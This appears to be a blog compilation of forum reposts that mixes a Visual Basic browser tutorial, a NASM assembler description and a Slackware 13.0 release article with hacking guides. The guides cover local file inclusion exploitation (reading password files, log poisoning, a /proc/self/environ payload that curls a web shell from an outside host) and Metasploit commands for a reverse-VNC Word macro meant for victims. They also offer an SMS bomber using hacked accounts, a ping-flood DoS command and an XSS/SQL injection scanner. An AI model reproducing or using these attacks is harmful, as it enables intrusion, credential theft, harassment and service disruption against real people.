IT_Solution for Learning

Step one.

Get visual basic 2008 here.

Create a new form, select web app.

Step two.

Create 5 buttons, a web browser, and a text box. Tidy it up, make it cool.


Step three


The coding! Ok first, the five buttons are: Go, refresh, back, forward, home and stop.

So for each buttons or what ever I give you the code, double click the object, and copy&paste the code I give. Let's do this!


Go button

WebBrowser1.Navigate(TextBox1.Text)

Home button

WebBrowser1.gohome()

Refresh button

WebBrowser1.Refresh()

Back button

WebBrowser1.GoBack

Forward button

WebBrowser1.GoForward

Stop button

WebBrowser1.Stop

Then press F5 and you're done! I hope this helped you! I might do another TuT on advanced browsers. Have fun!

reference:hackforums.

NASM - The Netwide Assembler is 80x86 assembler designed for portability and modularity.

NASM is an 80x86 assembler designed for portability and modularity. The project supports a range of object file formats including Linux a.out and ELF, COFF, Microsoft 16-bit OBJ and Win32. It will also output plain binary files.

Its syntax is designed to be simple and easy to understand, similar to Intel's but less complex. It supports Pentium, P6, MMX, 3DNow! and SSE opcodes, and has macro capability. It includes a disassembler as well.

The Netwide Assembler grew out of an idea on comp.lang.asm.x86 (or possibly alt.lang.asm - I forget which), which was essentially that there didn't seem to be a good free x86-series assembler around, and that maybe someone ought to write one.

- a86 is good, but not free, and in particular you don't get any 32-bit capability until you pay. It's DOS only, too.
- gas is free, and ports over DOS and Unix, but it's not very good, since it's designed to be a back end to gcc, which always feeds it correct code. So its error checking is minimal. Also, its syntax is horrible, from the point of view of anyone trying to actually write anything in it. Plus you can't write 16-bit code in it (properly).
- as86 is Minix- and Linux-specific, and (my version at least) doesn't seem to have much (or any) documentation.
- MASM isn't very good, and it's (was) expensive, and it runs only under DOS.
- TASM is better, but still strives for MASM compatibility, which means millions of directives and tons of red tape. And its syntax is essentially MASM's, with the contradictions and quirks that entails (although it sorts out some of those by means of Ideal mode). It's expensive too. And it's DOS-only.

So here, for your coding pleasure, is NASM. At present it's still in prototype stage - we don't promise that it can outperform any of these assemblers. But please, please send us bug reports, fixes, helpful information, and anything else you can get your hands on (and thanks to the many people who've done this already! You all know who you are), and we'll improve it out of all recognition. Again.

Installing NASM under Unix

Once you've obtained the Unix source archive for NASM, nasm-X.XX.tar.gz (where X.XX denotes the version number of NASM contained in the archive), unpack it into a directory such as /usr/local/src. The archive, when unpacked, will create its own subdirectory nasm-X.XX.

NASM is an auto-configuring package: once you've unpacked it, cd to the directory it's been unpacked into and type ./configure. This shell script will find the best C compiler to use for building NASM and set up Makefiles accordingly.

Once NASM has auto-configured, you can type make to build the nasm and ndisasm binaries, and then make install to install them in /usr/local/bin and install the man pages nasm.1 and ndisasm.1 in /usr/local/man/man1. Alternatively, you can give options such as --prefix to the configure script (see the file INSTALL for more details), or install the programs yourself.

NASM also comes with a set of utilities for handling the RDOFF custom object-file format, which are in the rdoff subdirectory of the NASM archive. You can build these with make rdf and install them with make rdf_install, if you want them.

If NASM fails to auto-configure, you may still be able to make it compile by using the fall-back Unix makefile Makefile.unx. Copy or rename that file to Makefile and try typing make. There is also a Makefile.unx file in the rdoff subdirectory.

What's New in This Release: [ read full changelog ]

· NASM is now under the 2-clause BSD license. See section 1.1.2.
· Fix the section type for the .strtab section in the elf64 output format.
· Fix the handling of COMMON directives in the obj output format.
· New ith and srec output formats; these are variants of the bin output format which output Intel hex and Motorola S-records, respectively. See section 7.2 and section 7.3.
· rdf2ihx replaced with an enhanced rdf2bin, which can output binary, COM, Intel hex or Motorola S-records.
· The Windows installer now puts the NASM directory first in the PATH of the "NASM Shell".
· Revert the early expansion behavior of %+ to pre-2.06 behavior: %+ is only expanded late.
· Yet another Mach-O alignment fix.
· Don't delete the list file on errors. Also, include error and warning information in the list file.
· Support for 64-bit Mach-O output, see section 7.8.
· Fix assert failure on certain operations that involve strings with high-bit bytes.

refrence:http://linux.softpedia.com/get/Programming/Compilers/NASM-The-Netwide-Assembler-643.shtml

Allright, so i got this question often... Some guy got a LFI vuln some place but, what the fuck do i use it for?

Well, there is a few things you can do with it..

1. If /etc/passwd contains the user password on the system you can use ssh(assuming they got ssh and uses the users on the system as login) or if someone is a fucking idiot and make /etc/shadow readeble for anyone if /etc/passwd is just x'ed out... If on windows machine maybe you can include the SAM file? dunno..

2. You can try to include the error or access log and then telnet to the server and make it write php code to error or access log that way you can get a shell! Also if error eller access logg loggs user agent or other shit you can just browse the page with php in the useragent then include it

3. If its a shared host or a server with more pages on it you can try to find upload forms etc etc on the other pages hosted on the same server, then make a image containing php code inside it, then include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain to, if it got some kindof upload form, and it dosent need to be images, can be documents or pdf's, anything!

4. Finding config or other interesting files... Many idiots store their ftp and or ssh info in .txt or doc files outside the www dir, but if you got LFI you can include those anyway! Takes a bit time trying out file names and shit trouth xD Also .config files or config.php files can contain things like root mysqld info and that can lead to more interesting stuff! Also, maybe a page got a basic login system with reading from a config.php so you can get admin access on the page..


5. if its site and forum you can upload image with aribitary code then include and execute it..

6. You even can make it vnl to LFI
Code:

then
Code:

http://anything.org/index.php?action=../proc/self/environ?cmd=curlhttp://zero-thunder.com/mu.txt -o zero.php

and the shell will be up like this

Code:

http://anything.org/zero.php

7. or u can do something like this ..
if proc/self/environ is accessible you can
Code:

zero.php is the shell and the server will download
Code:

http://zero-thunder.com/mu.txt

and it will save it as zero.php and u will get something like this

Code:

http://anything.org/zero.php

reference:cyberterrorist

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

reference:darkc0de

SMS Bomber by AlphaDog

-Spams Cell Phones With Text Messages (SMS Bombing)

-Use

1.Select a smtp server & Port, The givin smtp svr and prt is for Gmail accounts
SMTP is the incoming and outgoing connection w/e this uses out going, smtp is used for every mailing system.

2.Type in the account information , email info / email and pass , if you don't want to use your account just select one of the ready hacked ones ..


3.Fill :
-Victims cell number
-How many to spam
-Provider

4.Type in message

5.Start Tongue

*Note that this program may harm your PC if you have CPU like Pentium 3 or older ...

so that's about it ... as you see its 1.0 so there will be updates .. i will try to imput providers providers from Macedonia and 2-3 other countries.

DOWNLOAD:
Code:

http://rapidshare.com/files/277283168/AlphaDog_SMS_Bomber.rar.html

Enjoy......................

refrence:evilzone

Q: what is dos ??
A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type

ping www.yoursitename.com

or

nslookup yoursite .com


It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..


------> ping SITE-IP -l 65500 -n 10000000 -w 0.00001 <------

Here -n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

reference:cyberterorist forum..

URL Dumper is an Online scanner coded by me with VB.NET in the last years ago..
Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc..

Features:
-Get all page links by advanced technique with regular expression;
-XSS Scanner (auto check all page links);
-SQLInjection Scanner (auto check all page links);
-Multi-Thread engine;
-Get many links by search (google/Yahoo/Live Search/Altavista/Terravista)
-Search in the page source by regular expression;
-View Source (Code/Browser);
-Trash system
-Database in SQLite to organize the URL’s
-Enabled Proxy server
-Etc..

Coded by me with vb.net 2008

Screen Shot:



Download BIN:
Download SRC:
Tags: URL Dump oficial blog URL Dumper URL Dumper Source Code for free URL Dumper v.2 XSS and SQL Injection scanner;free tool

reference:http://flash.i.ph/blogs/flash/2009/01/20/url-dumper-v2/

After a long wait, Slackware fans are finally able to rejoice, as Patrick J. Volkerding announced late yesterday that Slackware 13.0 was available at last. The changes definitely warrant the major version bump, since this release has a number of unique features that its predecessor wasn't capable of, like running natively on 64-bit processors, improved X Window System that doesn't require an xorg.conf file and a massively overhauled set of build scripts.

Volkerding's enthusiasm about this release is visible in his announcement: "Yes it's that time again! After many months of development and careful testing, we are proud to announce the release of Slackware version 13.0! We are sure you'll agree that the improvements made in this release more than warrant the major version bump up from the 12.x series. We've done our best to bring the latest technology to Slackware while still maintaining the stability and security that you have come to expect."

The low-level functions are provided by the Linux kernel, version 2.6.29.6, which makes the system faster and includes support for the X Direct Rendering Interface that enables the display of hardware accelerated 3D graphics. Also, the kernel is patched to support speech synthesizers, a very useful function for the visually impaired users. A core change since Slackware 12.2 is that some devices, like network hardware, are now initialized at install time, and the new udev scripts are tweaked to give normal users a seamless experience when managing their devices.

On top of that kernel you can have by default one of the two supported desktop environments: KDE 4.2.4 or Xfce 4.6.1. GNOME fans won't feel totally stranded, as Pidgin 2.5.9, Gimp-2.6.6 and xChat 2.8.6 are included. The other applications are what you would expect from a modern operating system, with Firefox 3.5.2 on board, as well as Thunderbird 2.0.0.23. Programmers will surely enjoy the new development tools, like Perl 5.10.0, Python 2.6.2, Ruby 1.8.7-p174, Subversion 1.6.4, Git 1.6.4, Mercurial 1.2.1.

Download Slackware 13.0 right now from Softpedia.